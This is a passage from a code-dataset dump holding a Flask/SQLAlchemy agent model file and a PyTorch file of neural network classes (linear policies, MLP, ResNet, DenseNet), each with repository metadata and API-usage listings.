101, "usage_type": "attribute"}, {"api_name": "sqlalchemy.insert", "line_number": 110, "usage_type": "call"}, {"api_name": "db.courses", "line_number": 110, "usage_type": "attribute"}, {"api_name": "db.database.execute", "line_number": 111, "usage_type": "call"}, {"api_name": "db.database", "line_number": 111, "usage_type": "attribute"}, {"api_name": "sqlalchemy.insert", "line_number": 120, "usage_type": "call"}, {"api_name": "db.dogCourse", "line_number": 120, "usage_type": "attribute"}, {"api_name": "db.database.execute", "line_number": 121, "usage_type": "call"}, {"api_name": "db.database", "line_number": 121, "usage_type": "attribute"}, {"api_name": "sqlalchemy.insert", "line_number": 130, "usage_type": "call"}, {"api_name": "db.sessions", "line_number": 130, "usage_type": "attribute"}, {"api_name": "db.database.execute", "line_number": 131, "usage_type": "call"}, {"api_name": "db.database", "line_number": 131, "usage_type": "attribute"}]} +{"seq_id": "21829461248", "text": "import requests\nfrom flask import session\nfrom sqlalchemy import Column, Integer, String, JSON, ForeignKey\nfrom sqlalchemy.ext.associationproxy import association_proxy\nfrom sqlalchemy.orm import relationship, make_transient\n\nfrom python_utils.config import server_config\nfrom python_utils.flask_sqlalchemy_base import db, ParametrizedMixin, AuditMixin, JsonDeSerMixin\n\n\nclass 
Agent(db.Model, ParametrizedMixin, AuditMixin, JsonDeSerMixin):\n __tablename__ = 'agent'\n __table_args__ = {'schema': 'illusionist'}\n\n id = Column(Integer, autoincrement=True, primary_key=True)\n name = Column(String(200))\n description = Column(String(1000))\n editing_by = Column(String(128), nullable=True, default=None)\n app_id = Column(Integer, ForeignKey(\"admin_console.app.id\"))\n settings = Column(JSON)\n state = Column(String)\n bots = association_proxy('agent_bots', 'bot')\n services = relationship(\"Service\")\n\n def __init__(self, name='', description='', editing_by={}, app_id=0, params={}, settings={}, state='draft', **kwargs):\n self.name = name\n self.description = description\n self.editing_by = editing_by\n self.app_id = app_id\n self.settings = settings\n self.state = state\n if params:\n self.params = params\n else:\n ParametrizedMixin.__init__(self, kwargs)\n\n def __repr__(self):\n return 'Agent({})'.format(self.id)\n\n def get_id(self, **kwargs):\n return self.id\n\n def get_config(self, agent_id):\n agent_config = session.get('agent_config', {})\n if not agent_config:\n agent = Agent.query.filter_by(id=agent_id).first()\n agent_config = agent.parameters\n session.setdefault('agent_config', agent_config)\n return agent_config\n\n def clone(self):\n db.session.expunge(self)\n make_transient(self)\n self.id = None\n self.name = 'clone of ' + self.name\n db.session.add(self)\n db.session.commit()\n\n\nclass AgentsSimilarityMatrix(db.Model, JsonDeSerMixin, AuditMixin):\n __tablename__ = 'agents_similarity_matrix'\n\n matrix_id = Column(Integer, autoincrement=True)\n agent_id = Column(Integer, ForeignKey(Agent.id), primary_key=True)\n nlp = Column(String, primary_key=True)\n match_unit = Column(String, primary_key=True)\n matrix = Column(JSON)\n\n def __init__(self, agent_id='', **kwargs):\n self.agent_id = agent_id\n\n def update(self, nlp='spacy', match_unit='match_unit'):\n agent_id = self.agent_id\n luke_url = server_config['luke']['base_url']\n matrix_url = '{luke_url}/api/apps/{app_id}/similarity_matrix/{nlp}/{match_unit}'.format(**locals())\n response = requests.get(matrix_url)\n\n self.nlp = nlp\n self.match_unit = match_unit\n self.matrix = response.json()['similarity_matrix']\n\n db.session.merge(self)\n db.session.commit()", "repo_name": "chentingdong/illusionist", "sub_path": "illusionist/models/agent.py", "file_name": "agent.py", "file_ext": "py", "file_size_in_byte": 2926, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "python_utils.flask_sqlalchemy_base.db.Model", "line_number": 11, "usage_type": "attribute"}, {"api_name": "python_utils.flask_sqlalchemy_base.db", "line_number": 11, "usage_type": "name"}, {"api_name": "python_utils.flask_sqlalchemy_base.ParametrizedMixin", "line_number": 11, "usage_type": "name"}, {"api_name": "python_utils.flask_sqlalchemy_base.AuditMixin", "line_number": 11, "usage_type": "name"}, {"api_name": "python_utils.flask_sqlalchemy_base.JsonDeSerMixin", "line_number": 11, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 15, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 15, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 16, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 16, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 17, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 17, "usage_type": 
"call"}, {"api_name": "sqlalchemy.Column", "line_number": 18, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 18, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 19, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 19, "usage_type": "argument"}, {"api_name": "sqlalchemy.ForeignKey", "line_number": 19, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 20, "usage_type": "call"}, {"api_name": "sqlalchemy.JSON", "line_number": 20, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 21, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 21, "usage_type": "argument"}, {"api_name": "sqlalchemy.ext.associationproxy.association_proxy", "line_number": 22, "usage_type": "call"}, {"api_name": "sqlalchemy.orm.relationship", "line_number": 23, "usage_type": "call"}, {"api_name": "python_utils.flask_sqlalchemy_base.ParametrizedMixin.__init__", "line_number": 35, "usage_type": "call"}, {"api_name": "python_utils.flask_sqlalchemy_base.ParametrizedMixin", "line_number": 35, "usage_type": "name"}, {"api_name": "flask.session.get", "line_number": 44, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 44, "usage_type": "name"}, {"api_name": "flask.session.setdefault", "line_number": 48, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 48, "usage_type": "name"}, {"api_name": "python_utils.flask_sqlalchemy_base.db.session.expunge", "line_number": 52, "usage_type": "call"}, {"api_name": "python_utils.flask_sqlalchemy_base.db.session", "line_number": 52, "usage_type": "attribute"}, {"api_name": "python_utils.flask_sqlalchemy_base.db", "line_number": 52, "usage_type": "name"}, {"api_name": "sqlalchemy.orm.make_transient", "line_number": 53, "usage_type": "call"}, {"api_name": "python_utils.flask_sqlalchemy_base.db.session.add", "line_number": 56, "usage_type": "call"}, {"api_name": "python_utils.flask_sqlalchemy_base.db.session", "line_number": 56, "usage_type": "attribute"}, {"api_name": "python_utils.flask_sqlalchemy_base.db", "line_number": 56, "usage_type": "name"}, {"api_name": "python_utils.flask_sqlalchemy_base.db.session.commit", "line_number": 57, "usage_type": "call"}, {"api_name": "python_utils.flask_sqlalchemy_base.db.session", "line_number": 57, "usage_type": "attribute"}, {"api_name": "python_utils.flask_sqlalchemy_base.db", "line_number": 57, "usage_type": "name"}, {"api_name": "python_utils.flask_sqlalchemy_base.db.Model", "line_number": 60, "usage_type": "attribute"}, {"api_name": "python_utils.flask_sqlalchemy_base.db", "line_number": 60, "usage_type": "name"}, {"api_name": "python_utils.flask_sqlalchemy_base.JsonDeSerMixin", "line_number": 60, "usage_type": "name"}, {"api_name": "python_utils.flask_sqlalchemy_base.AuditMixin", "line_number": 60, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 63, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 63, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 64, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 64, "usage_type": "argument"}, {"api_name": "sqlalchemy.ForeignKey", "line_number": 64, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 65, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 65, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 66, "usage_type": "call"}, {"api_name": "sqlalchemy.String", 
"line_number": 66, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 67, "usage_type": "call"}, {"api_name": "sqlalchemy.JSON", "line_number": 67, "usage_type": "argument"}, {"api_name": "python_utils.config.server_config", "line_number": 74, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 76, "usage_type": "call"}, {"api_name": "python_utils.flask_sqlalchemy_base.db.session.merge", "line_number": 82, "usage_type": "call"}, {"api_name": "python_utils.flask_sqlalchemy_base.db.session", "line_number": 82, "usage_type": "attribute"}, {"api_name": "python_utils.flask_sqlalchemy_base.db", "line_number": 82, "usage_type": "name"}, {"api_name": "python_utils.flask_sqlalchemy_base.db.session.commit", "line_number": 83, "usage_type": "call"}, {"api_name": "python_utils.flask_sqlalchemy_base.db.session", "line_number": 83, "usage_type": "attribute"}, {"api_name": "python_utils.flask_sqlalchemy_base.db", "line_number": 83, "usage_type": "name"}]} +{"seq_id": "13885662686", "text": "\nfrom torch import nn\nfrom torch.nn import functional as F\nimport math\nimport torch\n\n# something for discrete outputs\nclass SoftmaxDiscreteLinearModel(nn.Module):\n def __init__(self, num_inputs, num_actions):\n super(SoftmaxDiscreteLinearModel, self).__init__()\n # set info\n self.num_inputs = num_inputs\n self.num_actions = num_actions\n self.output_linear = nn.Linear(num_inputs, num_actions)\n self.model_type = 'SoftmaxDiscreteLinearModel'\n if num_actions == 1:\n self.sm = torch.nn.Sigmoid()\n else:\n self.sm = nn.Softmax(dim=1)\n def sample(self, state):\n probs = self.forward(state)\n dist = torch.distributions.Categorical(probs)\n action = dist.sample()\n return dist.sample(), dist.log_prob(action), torch.argmax(logits,dim=-1)\n def log_prob(self, state, action):\n if not torch.is_tensor(state):\n state = torch.tensor(state).to(self.device)\n action = torch.tensor(action).to(self.device)\n probs = self.forward(state)\n dist = torch.distributions.Categorical(probs)\n return dist.log_prob(action)\n def transform_state(self, state):\n return state\n def forward(self, state):\n state = self.transform_state(state)\n logits = self.output_linear(state)\n # logits = torch.clamp(logits, min=-8,max=2)\n probs = self.sm(logits)\n if self.num_actions == 1:\n probs = probs.reshape(-1) \n return probs\n\n# something for discrete outputs\nclass DiscreteLinearModel(nn.Module):\n def __init__(self, num_inputs, num_actions):\n super(DiscreteLinearModel, self).__init__()\n # set info\n self.num_inputs = num_inputs\n self.num_actions = num_actions\n self.output_linear = nn.Linear(num_inputs, num_actions)\n self.model_type = 'DiscreteLinearModel'\n def sample(self, state):\n logits = self.forward(state)\n logits = torch.clamp(logits, min=-20,max=2)\n dist = torch.distributions.Categorical(logits=logits)\n action = dist.sample()\n return dist.sample(), dist.log_prob(action), torch.argmax(logits,dim=-1)\n def log_prob(self, state, action):\n if not torch.is_tensor(state):\n state = torch.tensor(state).to(self.device)\n action = torch.tensor(action).to(self.device)\n logits = self.forward(state)\n logits = torch.clamp(logits, min=-20,max=20)\n dist = torch.distributions.Categorical(logits=logits)\n return dist.log_prob(action)\n def transform_state(self, state):\n # if torch.is_tensor(state):\n # state = state.cpu().numpy()\n return state\n def forward(self, state):\n state = self.transform_state(state)\n logits = self.output_linear(state)\n return logits\n\n# 
=====================================================\n# Something for continous outputs\nclass ContinuousLinearModel(nn.Module):\n def __init__(self, num_inputs, num_actions):\n super(ContinuousLinearModel, self).__init__()\n # something to compute it all\n self.mean_linear = nn.Linear(num_inputs, num_actions)\n\n def forward(self, state):\n state = state.float()\n output = self.mean_linear(state)\n return self.mean_linear(state)\n\n# =====================================================\n# Network for mfac\nclass LinearNueralNetworkModel(nn.Module):\n def __init__(self, input_size, hidden_sizes, output_size, bias=True):\n super().__init__()\n self._prediction_params = None\n self.input_size = input_size\n if output_size:\n self.output_size = output_size\n self.squeeze_output = False\n else:\n self.output_size = 1\n self.squeeze_output = True\n if len(hidden_sizes) == 0:\n self.hidden_layers = []\n self.output_layer = nn.Linear(self.input_size, self.output_size, bias=bias)\n else:\n self.hidden_layers = nn.ModuleList([nn.Linear(in_size, out_size, bias=bias) for in_size, out_size in zip([self.input_size] + hidden_sizes[:-1], hidden_sizes)])\n self.output_layer = nn.Linear(hidden_sizes[-1], self.output_size, bias=bias)\n def forward(self, x):\n x = x.view(-1, self.input_size)\n out = x\n for layer in self.hidden_layers:\n Z = layer(out)\n out = Z\n logits = self.output_layer(out)\n if self.squeeze_output:\n logits = torch.squeeze(logits)\n return logits\n\n# =====================================================\n# MLP\nclass Mlp(nn.Module):\n def __init__(self, input_size=784,\n hidden_sizes=[512, 256],\n n_classes=10,\n bias=True, dropout=False):\n super().__init__()\n\n self.dropout=dropout\n self.input_size = input_size\n self.hidden_layers = nn.ModuleList([nn.Linear(in_size, out_size, bias=bias) for\n in_size, out_size in zip([self.input_size] + hidden_sizes[:-1], hidden_sizes)])\n self.output_layer = nn.Linear(hidden_sizes[-1], n_classes, bias=bias)\n\n def forward(self, x):\n x = x.view(-1, self.input_size)\n out = x\n for layer in self.hidden_layers:\n Z = layer(out)\n out = F.relu(Z)\n\n if self.dropout:\n out = F.dropout(out, p=0.5)\n\n logits = self.output_layer(out)\n\n return logits\n\n# =====================================================\n# ResNet\nclass ResNet(nn.Module):\n def __init__(self, num_blocks, num_classes=10):\n super().__init__()\n block = BasicBlock\n self.in_planes = 64\n\n self.conv1 = nn.Conv2d(\n 3, 64, kernel_size=3, stride=1, padding=1, bias=False)\n self.bn1 = nn.BatchNorm2d(64)\n self.layer1 = self._make_layer(block, 64, num_blocks[0], stride=1)\n self.layer2 = self._make_layer(block, 128, num_blocks[1], stride=2)\n self.layer3 = self._make_layer(block, 256, num_blocks[2], stride=2)\n self.layer4 = self._make_layer(block, 512, num_blocks[3], stride=2)\n self.linear = nn.Linear(512 * block.expansion, num_classes)\n\n def _make_layer(self, block, planes, num_blocks, stride):\n strides = [stride] + [1] * (num_blocks - 1)\n layers = []\n for stride in strides:\n layers.append(block(self.in_planes, planes, stride))\n self.in_planes = planes * block.expansion\n return nn.Sequential(*layers)\n\n def forward(self, x):\n out = F.relu(self.bn1(self.conv1(x)))\n out = self.layer1(out)\n out = self.layer2(out)\n out = self.layer3(out)\n out = self.layer4(out)\n out = F.avg_pool2d(out, 4)\n out = out.view(out.size(0), -1)\n out = self.linear(out)\n return out\n\n\nclass BasicBlock(nn.Module):\n expansion = 1\n\n def __init__(self, in_planes, planes, stride=1):\n 
super(BasicBlock, self).__init__()\n self.conv1 = nn.Conv2d(\n in_planes,\n planes,\n kernel_size=3,\n stride=stride,\n padding=1,\n bias=False)\n self.bn1 = nn.BatchNorm2d(planes)\n self.conv2 = nn.Conv2d(\n planes, planes, kernel_size=3, stride=1, padding=1, bias=False)\n self.bn2 = nn.BatchNorm2d(planes)\n\n self.shortcut = nn.Sequential()\n if stride != 1 or in_planes != self.expansion * planes:\n self.shortcut = nn.Sequential(\n nn.Conv2d(\n in_planes,\n self.expansion * planes,\n kernel_size=1,\n stride=stride,\n bias=False), nn.BatchNorm2d(self.expansion * planes))\n\n def forward(self, x):\n out = F.relu(self.bn1(self.conv1(x)))\n out = self.bn2(self.conv2(out))\n out += self.shortcut(x)\n out = F.relu(out)\n return out\n\n\nclass Bottleneck(nn.Module):\n expansion = 4\n\n def __init__(self, in_planes, planes, stride=1):\n super(Bottleneck, self).__init__()\n self.conv1 = nn.Conv2d(in_planes, planes, kernel_size=1, bias=False)\n self.bn1 = nn.BatchNorm2d(planes)\n self.conv2 = nn.Conv2d(\n planes,\n planes,\n kernel_size=3,\n stride=stride,\n padding=1,\n bias=False)\n self.bn2 = nn.BatchNorm2d(planes)\n self.conv3 = nn.Conv2d(\n planes, self.expansion * planes, kernel_size=1, bias=False)\n self.bn3 = nn.BatchNorm2d(self.expansion * planes)\n\n self.shortcut = nn.Sequential()\n if stride != 1 or in_planes != self.expansion * planes:\n self.shortcut = nn.Sequential(\n nn.Conv2d(\n in_planes,\n self.expansion * planes,\n kernel_size=1,\n stride=stride,\n bias=False), nn.BatchNorm2d(self.expansion * planes))\n\n def forward(self, x):\n out = F.relu(self.bn1(self.conv1(x)))\n out = F.relu(self.bn2(self.conv2(out)))\n out = self.bn3(self.conv3(out))\n out += self.shortcut(x)\n out = F.relu(out)\n return out\n\n\nclass Bottleneck_DenseNet(nn.Module):\n def __init__(self, in_planes, growth_rate):\n super().__init__()\n self.bn1 = nn.BatchNorm2d(in_planes)\n self.conv1 = nn.Conv2d(in_planes, 4*growth_rate, kernel_size=1, bias=False)\n self.bn2 = nn.BatchNorm2d(4*growth_rate)\n self.conv2 = nn.Conv2d(4*growth_rate, growth_rate, kernel_size=3, padding=1, bias=False)\n\n def forward(self, x):\n out = self.conv1(F.relu(self.bn1(x)))\n out = self.conv2(F.relu(self.bn2(out)))\n out = torch.cat([out,x], 1)\n return out\n\n\nclass Transition(nn.Module):\n def __init__(self, in_planes, out_planes):\n super(Transition, self).__init__()\n self.bn = nn.BatchNorm2d(in_planes)\n self.conv = nn.Conv2d(in_planes, out_planes, kernel_size=1, bias=False)\n\n def forward(self, x):\n out = self.conv(F.relu(self.bn(x)))\n out = F.avg_pool2d(out, 2)\n return out\n\nclass DenseNet(nn.Module):\n def __init__(self, block, nblocks, growth_rate=12, reduction=0.5, num_classes=10):\n super().__init__()\n self.growth_rate = growth_rate\n\n num_planes = 2*growth_rate\n self.conv1 = nn.Conv2d(3, num_planes, kernel_size=3, padding=1, bias=False)\n\n self.dense1 = self._make_dense_layers(block, num_planes, nblocks[0])\n num_planes += nblocks[0]*growth_rate\n out_planes = int(math.floor(num_planes*reduction))\n self.trans1 = Transition(num_planes, out_planes)\n num_planes = out_planes\n\n self.dense2 = self._make_dense_layers(block, num_planes, nblocks[1])\n num_planes += nblocks[1]*growth_rate\n out_planes = int(math.floor(num_planes*reduction))\n self.trans2 = Transition(num_planes, out_planes)\n num_planes = out_planes\n\n self.dense3 = self._make_dense_layers(block, num_planes, nblocks[2])\n num_planes += nblocks[2]*growth_rate\n out_planes = int(math.floor(num_planes*reduction))\n self.trans3 = Transition(num_planes, 
out_planes)\n num_planes = out_planes\n\n self.dense4 = self._make_dense_layers(block, num_planes, nblocks[3])\n num_planes += nblocks[3]*growth_rate\n\n self.bn = nn.BatchNorm2d(num_planes)\n self.linear = nn.Linear(num_planes, num_classes)\n\n def _make_dense_layers(self, block, in_planes, nblock):\n layers = []\n for i in range(nblock):\n layers.append(block(in_planes, self.growth_rate))\n in_planes += self.growth_rate\n return nn.Sequential(*layers)\n\n def forward(self, x):\n out = self.conv1(x)\n out = self.trans1(self.dense1(out))\n out = self.trans2(self.dense2(out))\n out = self.trans3(self.dense3(out))\n out = self.dense4(out)\n out = F.avg_pool2d(F.relu(self.bn(out)), 4)\n out = out.view(out.size(0), -1)\n out = self.linear(out)\n return out\n\ndef DenseNet121(num_classes):\n return DenseNet(Bottleneck_DenseNet, [6,12,24,16], growth_rate=32,\n num_classes=num_classes)\n\ndef DenseNet169():\n return DenseNet(Bottleneck_DenseNet, [6,12,32,32], growth_rate=32)\n\ndef DenseNet201():\n return DenseNet(Bottleneck_DenseNet, [6,12,48,32], growth_rate=32)\n\ndef DenseNet161():\n return DenseNet(Bottleneck_DenseNet, [6,12,36,24], growth_rate=48)\n\ndef densenet_cifar():\n return DenseNet(Bottleneck_DenseNet, [6,12,24,16], growth_rate=12)\n", "repo_name": "WilderLavington/Target-Based-Surrogates-For-Stochastic-Optimization", "sub_path": "models.py", "file_name": "models.py", "file_ext": "py", "file_size_in_byte": 12638, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "41", "api": [{"api_name": "torch.nn.Module", "line_number": 8, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 8, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 14, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 14, "usage_type": "name"}, {"api_name": "torch.nn.Sigmoid", "line_number": 17, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 17, "usage_type": "attribute"}, {"api_name": "torch.nn.Softmax", "line_number": 19, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 19, "usage_type": "name"}, {"api_name": "torch.distributions.Categorical", "line_number": 22, "usage_type": "call"}, {"api_name": "torch.distributions", "line_number": 22, "usage_type": "attribute"}, {"api_name": "torch.argmax", "line_number": 24, "usage_type": "call"}, {"api_name": "torch.is_tensor", "line_number": 26, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 27, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 28, "usage_type": "call"}, {"api_name": "torch.distributions.Categorical", "line_number": 30, "usage_type": "call"}, {"api_name": "torch.distributions", "line_number": 30, "usage_type": "attribute"}, {"api_name": "torch.nn.Module", "line_number": 44, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 44, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 50, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 50, "usage_type": "name"}, {"api_name": "torch.clamp", "line_number": 54, "usage_type": "call"}, {"api_name": "torch.distributions.Categorical", "line_number": 55, "usage_type": "call"}, {"api_name": "torch.distributions", "line_number": 55, "usage_type": "attribute"}, {"api_name": "torch.argmax", "line_number": 57, "usage_type": "call"}, {"api_name": "torch.is_tensor", "line_number": 59, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 60, "usage_type": "call"}, {"api_name": "torch.tensor", 
"line_number": 61, "usage_type": "call"}, {"api_name": "torch.clamp", "line_number": 63, "usage_type": "call"}, {"api_name": "torch.distributions.Categorical", "line_number": 64, "usage_type": "call"}, {"api_name": "torch.distributions", "line_number": 64, "usage_type": "attribute"}, {"api_name": "torch.nn.Module", "line_number": 77, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 77, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 81, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 81, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 90, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 90, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 103, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 103, "usage_type": "name"}, {"api_name": "torch.nn.ModuleList", "line_number": 105, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 105, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 105, "usage_type": "call"}, {"api_name": "torch.nn.Linear", "line_number": 106, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 106, "usage_type": "name"}, {"api_name": "torch.squeeze", "line_number": 115, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 120, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 120, "usage_type": "name"}, {"api_name": "torch.nn.ModuleList", "line_number": 129, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 129, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 129, "usage_type": "call"}, {"api_name": "torch.nn.Linear", "line_number": 131, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 131, "usage_type": "name"}, {"api_name": "torch.nn.functional.relu", "line_number": 138, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 138, "usage_type": "name"}, {"api_name": "torch.nn.functional.dropout", "line_number": 141, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 141, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 149, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 149, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 155, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 155, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 157, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 157, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 162, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 162, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 170, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 170, "usage_type": "name"}, {"api_name": "torch.nn.functional.relu", "line_number": 173, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 173, "usage_type": "name"}, {"api_name": "torch.nn.functional.avg_pool2d", "line_number": 178, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 178, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 184, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 184, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 189, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 189, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 196, 
"usage_type": "call"}, {"api_name": "torch.nn", "line_number": 196, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 197, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 197, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 199, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 199, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 201, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 201, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 203, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 203, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 204, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 204, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 209, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 209, "usage_type": "name"}, {"api_name": "torch.nn.functional.relu", "line_number": 212, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 212, "usage_type": "name"}, {"api_name": "torch.nn.functional.relu", "line_number": 215, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 215, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 219, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 219, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 224, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 224, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 225, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 225, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 226, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 226, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 233, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 233, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 234, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 234, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 236, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 236, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 238, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 238, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 240, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 240, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 241, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 241, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 246, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 246, "usage_type": "name"}, {"api_name": "torch.nn.functional.relu", "line_number": 249, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 249, "usage_type": "name"}, {"api_name": "torch.nn.functional.relu", "line_number": 250, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 250, "usage_type": "name"}, {"api_name": "torch.nn.functional.relu", "line_number": 253, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 253, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 257, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 257, "usage_type": "name"}, {"api_name": 
"torch.nn.BatchNorm2d", "line_number": 260, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 260, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 261, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 261, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 262, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 262, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 263, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 263, "usage_type": "name"}, {"api_name": "torch.nn.functional.relu", "line_number": 266, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 266, "usage_type": "name"}, {"api_name": "torch.nn.functional.relu", "line_number": 267, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 267, "usage_type": "name"}, {"api_name": "torch.cat", "line_number": 268, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 272, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 272, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 275, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 275, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 276, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 276, "usage_type": "name"}, {"api_name": "torch.nn.functional.relu", "line_number": 279, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 279, "usage_type": "name"}, {"api_name": "torch.nn.functional.avg_pool2d", "line_number": 280, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 280, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 283, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 283, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 289, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 289, "usage_type": "name"}, {"api_name": "math.floor", "line_number": 293, 